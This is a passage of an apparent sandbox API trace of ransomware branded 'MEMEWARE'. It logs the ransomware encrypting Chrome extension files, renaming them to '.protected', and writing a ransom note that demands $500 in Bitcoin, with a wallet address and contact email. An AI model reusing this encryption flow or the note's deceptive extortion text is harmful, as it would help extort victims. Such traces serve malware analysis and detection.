(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.680] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.680] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.680] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.680] CloseHandle (hObject=0x164) returned 1 [0080.680] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0080.681] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl") returned 141 [0080.681] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0080.681] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*") returned 143 [0080.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.681] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\.") returned 143 [0080.681] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\..") returned 144 [0080.681] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.681] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.681] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.681] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.681] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.682] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbe, lpOverlapped=0x0) returned 1 [0080.683] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbe, lpOverlapped=0x0) returned 1 [0080.683] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.683] CloseHandle (hObject=0x168) returned 1 [0080.683] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected") returned 165 [0080.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected")) returned 1 [0080.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.684] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.684] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0080.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.691] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.691] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.691] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.692] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.692] CloseHandle (hObject=0x164) returned 1 [0080.693] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0080.693] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr") returned 141 [0080.693] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0080.693] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0080.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*") returned 143 [0080.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.694] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\.") returned 143 [0080.694] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.694] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\..") returned 144 [0080.694] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.694] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.694] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.694] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.694] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.695] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0080.696] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0080.696] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.696] CloseHandle (hObject=0x168) returned 1 [0080.696] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected") returned 165 [0080.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected")) returned 1 [0080.697] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.697] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.697] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0080.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.697] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.697] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.698] lstrlenA 